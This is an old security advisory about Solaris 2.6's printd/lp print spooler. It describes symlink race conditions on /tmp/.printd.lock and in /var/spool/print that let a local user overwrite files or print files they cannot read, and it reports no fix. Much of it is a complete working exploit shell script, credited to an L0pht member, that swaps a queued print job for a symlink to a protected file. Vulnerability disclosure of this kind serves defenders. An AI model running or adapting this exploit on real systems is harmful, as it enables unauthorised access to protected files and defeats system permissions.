COMMAND

    printd (lp)

SYSTEMS AFFECTED

    Solaris 2.6

PROBLEM

    L0pht, actually their member -  silicosis - found following.   Sun
    hasn't learned  from it's  past mistakes;  temp files  are still a
    problem this time it's with 'printd' (lp).  Upon printing a  large
    file  that  sits   in  the  queue   for  ~1minute,  a   lock  file
    (/tmp/.printd.lock) is created.  Before you print something large,
    create  a  symlink  pointing  to  the  /tmp/.printd.lock   towards
    something you'd like to create/overwrite.

    When printd is done, the file your pointing to will have mode 640,
    and the contents will contain printd's pid.  Sun has  restructured
    their  print  spooling  in  Solaris  2.6.  They've  gone over to a
    queueing system that's similar to sendmail:

        [~]lp .tcshrc
        [~]ls -al /var/spool/print
        total 12
        drwxr-xr-x   2 root     lp           512 Feb 20 12:44 .
        drwxrwxr-x  10 root     bin          512 Feb 17 11:28 ..
        -rw-rw-r--   1 root     staff          4 Feb 20 12:44 .seq
        -rw-r-----   1 root     staff         80 Feb 20 12:44 cfA037core
        lrwxrwxrwx   1 root     staff         19 Feb 20 12:44 dfA037core ->
        /home/sili/.tcshrc
        -rw-r-----   1 root     staff         23 Feb 20 12:44 xfA037core

    You have  your control,  transfer and  datafiles. The  datafile is
    just a symlink to  the file you printed,  so if you link  the file
    you  printed  to  something  else  *before*  the queue is flushed,
    printd will print it.  A simple exploit script:

    #!/bin/sh
    #
    #Print unreadable files on solaris2.6
    #sili@l0pht.com
    #
    # --If it didn't work, change $BIGFILE to
    #   something bigger.
    #
    # --Script usually works 80% of the time..
    #   Didn't work? Try again.. Throw something
    #   at the printspooler to slow it down.
    #

    TMPFILE="./.dmlr"
    BIGFILE="/usr/lib/libc.so.1"

    if [ $# != 1 ]; then
            echo "Usage:"
            echo
            echo "./script <file>"
            echo
            echo "Print unreadable files on Solaris2.6"
            echo "                  ----sili@l0pht.com"
            exit 1
    fi

    echo "Need a large file to print, using $BIGFILE."
    cp /usr/bin/vi $TMPFILE ; chmod 700 $TMPFILE
    lp $TMPFILE ;
    #sleep 1;

    rm $TMPFILE ; ln -s $1 $TMPFILE

    QF=`ls -al /var/spool/print |grep $TMPFILE |awk '{print $9}'`

    echo "Queue File: /var/spool/print/$QF"

    while [ -h /var/spool/print/$QF ]; do
            echo "Waiting for file to print";
            sleep 1;
    done

    echo "File printed. Erasing temp files."
    rm $TMPFILE

    echo "Done."
    echo
    echo " --sili@l0pht.com 1/20/98"

SOLUTION

    Nothing yet.